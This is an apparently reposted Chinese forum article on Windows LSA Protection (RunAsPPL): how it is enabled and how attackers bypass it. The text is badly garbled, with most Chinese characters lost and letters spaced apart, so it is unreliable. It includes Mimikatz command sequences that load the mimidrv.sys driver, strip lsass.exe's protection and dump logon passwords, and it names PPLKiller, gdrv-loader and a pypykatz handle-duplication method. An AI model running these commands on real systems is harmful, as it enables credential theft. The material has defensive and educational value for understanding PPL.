[1175] 2021-04-14_你真的了解LSAProtection(RunAsPPL)吗?

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-16
2021-04-14_你真的了解LSAProtection(RunAsPPL)吗? L S A   P r o t e c t i o n   ( R u n A s P P L ) C H A B U G   C h a B u g   2 0 2 1 - 0 4 - 1 4 h t t p s : / / i t m 4 n . g i t h u b . i o / l s a s s - r u n a s p p l / W i n d o w s L S A   P r o t e c t i o n R u n A s P P L L S A S S P P L R u n A s P P L L S A S S 使   C r e d e n t i a l   G u a r d [ 1 ]   C r e d e n t i a l   G u a r d L S A   P r o t e c t i o n L S A P r o t e c t i o n 访 L S A   P r o t e c t i o n 西   W i n d o w s   I n t e r n a l s   7 t h   E d i t i o n [ 2 ]   L S A R u n A s P P L R u n A s P P L M i c r o s o f t L S A [ 3 ] 1 . r e g e d i t . e x e 2 .   3 . D W O R D R u n A s P P L 1 ; 4 . H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l L s a
i m a g e . p n g 1 . 使 2 . 使 U E F I / [ 4 ] 使 M i c r o s o f t M i c r o s o f t S D L R u n A s P P L R u n A s P P L U E F I R u n A s P P L M i c r o s o f t L S A [ 5 ] R u n A s P P L M i m i k a t z P r o c D u m p
i m a g e . p n g 1 . 2 . 3 . S e D e b u g P r i v i l e g e ; 4 . 0 x 0 0 0 0 0 0 0 5 A d m i n i s t r a t o r s S e D e b u g P r i v i l e g e p r i v i l e g e : : d e b u g M i m i k a t z s e k u r l s a : : l o g o n p a s s w o r d s k u h l _ m _ s e k u r l s a _ a c q u i r e L S A ( ) m i m i k a t z / m o d u l e s / s e k u r l s a / k u h l _ m _ s e k u r l s a . c H A N D L E   h D a t a   =   N U L L ; D W O R D   p i d ; D W O R D   p r o c e s s R i g h t s   =   P R O C E S S _ V M _ R E A D   |   P R O C E S S _ Q U E R Y _ I N F O R M A T I O N ; k u l l _ m _ p r o c e s s _ g e t P r o c e s s I d F o r N a m e ( L " l s a s s . e x e " ,   & p i d ) ; h D a t a   =   O p e n P r o c e s s ( p r o c e s s R i g h t s ,   F A L S E ,   p i d ) ; i f   ( h D a t a   & &   h D a t a   ! =   I N V A L I D _ H A N D L E _ V A L U E )   {         / /   i f   O p e n P r o c e s s   O K }   e l s e   {         P R I N T _ E R R O R _ A U T O ( L " H a n d l e   o n   m e m o r y " ) ; }
W i n d o w s   A P I W i n 3 2 5 0 0 0 - 4 9 9 [ 6 ] P I D l s a s s . e x e W i n 3 2 访 使 使 访             使 使 R u n A s P P L R u n A s P P L 访 l s a s s . e x e P P L m i m i k a t z m i m i d r v . s y s R u n A s P P L M i m i k a t z 访 l s a s s . e x e } P R I N T _ E R R O R _ A U T O G e t L a s t E r r o r ( ) S e t L a s t E r r o r ( ) G e t L a s t E r r o r ( ) P R O C E S S _ V M _ R E A D P R O C E S S _ Q U E R Y _ I N F O R M A T I O N O p e n P r o c e s s 0 x 0 0 0 0 0 0 0 5 R u n A s P P L S e D e b u g P r i v i l e g e L S A S S
M i m i k a t z 使 P r o c e s s m i m i d r v . s y s 便 使 ! + 使 ! p r o c e s s p r o t e c t 访 l s a s s . e x e i m a g e . p n g 使 使 / r e m o v e 使 ! - i m a g e . p n g M i m i k a t z   l s a s s . e x e R u n A s P P L m i m i k a t z   #   ! + m i m i k a t z   #   ! p r o c e s s p r o t e c t   / p r o c e s s : l s a s s . e x e   / r e m o v e m i m i k a t z   #   p r i v i l e g e : : d e b u g m i m i k a t z   #   s e k u r l s a : : l o g o n p a s s w o r d s m i m i k a t z   #   ! p r o c e s s p r o t e c t   / p r o c e s s : l s a s s . e x e m i m i k a t z   #   ! - ! p r o c e s s p r o t e c t   / p r o c e s s : l s a s s . e x e
  M i m i k a t z 使 i m a g e . p n g i m a g e . p n g 使 M i m i k a t z m i m i d r v . s y s 使 U s e r - l a n d g d r v - l o a d e r [ 7 ] P P L K i l l e r [ 8 ] p y p y k a t z 使 B S O D @ S k e l S e c 访 l s a s s . e x e D u p i n g   A V   w i t h   h a n d l e s [ 9 ] P s P r o t e c t e d S i g n e r L s a - L i g h t P s P r o t e c t e d S i g n e r W i n T c b
A V / L S A S S 访 访 L S A S S O p e n P r o c e s s P r o c e s s S k e l S e c   O p e n P r o c e s s L S A S S 使 访 L S A S S R u n A s P P L 使 L S A S S 使 p y p y k a t z P P L 便 P P L W i n d o w s   V i s t a   /   S e r v e r   2 0 0 8 D R M M i c r o s o f t 便 使 W i n d o w s   M e d i a W i n d o w s   I n t e r n a l s 访 W i n d o w s   8 . 1   /   S e r v e r   2 0 1 2   R 2 M i c r o s o f t P r o t e c t e d   P r o c e s s   L i g h t P P L P P L p y p y k a t z   l i v e   l s a   - - m e t h o d   h a n d l e d u p P R O C E S S _ Q U E R Y _ L I M I T E D _ I N F O R M A T I O N P R O C E S S _ S E T _ L I M I T E D _ I N F O R M A T I O N P R O C E S S _ T E R M I N A T E P R O C E S S _ S U S P E N D _ R E S U M E
E P R O C E S S P r o t e c t i o n P r o t e c t i o n P S _ P R O T E C T I O N L e v e l 3 T y p e P P P P L 4 S i g n e r P S _ P R O T E C T E D _ S I G N E R t y p e d e f   s t r u c t   _ P S _ P R O T E C T I O N   {         u n i o n   {                 U C H A R   L e v e l ;                 s t r u c t   {                         U C H A R   T y p e       :   3 ;                         U C H A R   A u d i t     :   1 ;                                     / /   R e s e r v e d                         U C H A R   S i g n e r   :   4 ;                 } ;         } ; }   P S _ P R O T E C T I O N ,   * P P S _ P R O T E C T I O N ; a   U C H A R a n   u n s i g n e d   c h a r P S _ P R O T E C T E D _ T Y P E t y p e d e f   e n u m   _ P S _ P R O T E C T E D _ T Y P E   {         P s P r o t e c t e d T y p e N o n e   =   0 ,         P s P r o t e c t e d T y p e P r o t e c t e d L i g h t   =   1 ,         P s P r o t e c t e d T y p e P r o t e c t e d   =   2 }   P S _ P R O T E C T E D _ T Y P E ,   * P P S _ P R O T E C T E D _ T Y P E ; t y p e d e f   e n u m   _ P S _ P R O T E C T E D _ S I G N E R   {         P s P r o t e c t e d S i g n e r N o n e   =   0 ,             / /   0         P s P r o t e c t e d S i g n e r A u t h e n t i c o d e ,     / /   1         P s P r o t e c t e d S i g n e r C o d e G e n ,               / /   2         P s P r o t e c t e d S i g n e r A n t i m a l w a r e ,       / /   3         P s P r o t e c t e d S i g n e r L s a ,                       / /   4         P s P r o t e c t e d S i g n e r W i n d o w s ,               / /   5         P s P r o t e c t e d S i g n e r W i n T c b ,                 / /   6         P s P r o t e c t e d S i g n e r W i n S y s t e m ,           / /   7         P s P r o t e c t e d S i g n e r A p p ,                       / /   8         P s P r o t e c t e d S i g n e r M a x                         / /   9 }   P S _ P R O T E C T E D _ S I G N E R ,   * P P S _ P R O T E C T E D _ S I G N E R ;
i m a g e . p n g S i g n e r   T y p e s W i n d o w s   N T   6 . 3 P P L P P P P L E n h a n c e d   K e y   U s a g e   E K U i m a g e . p n g w i n i n i t . e x e S g r m B r o k e r . e x e
E K U W i n d o w s   T C B   C o m p o n e n t O I D   O I D P r o t e c t e d P r o c e s s   L i g h t w i n i n i t . e x e P r o t e c t e d   P r o c e s s S g r m B r o k e r . e x e P P P P L W i n T c b W i n d o w s   I n t e r n a l s   7 t h   E d i t i o n 1   P r o t e c t e d   P r o c e s s L i g h t P P L P P L 访 P P 访 P P P P L P P L 访 P P L P P L P P L 访 P P A C L 访 3 / w i n i n i t . e x e   0 l s a s s . e x e     L S A S S M s M p E n g . e x e     W i n d o w s   D e f e n d e r i m a g e . p n g
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则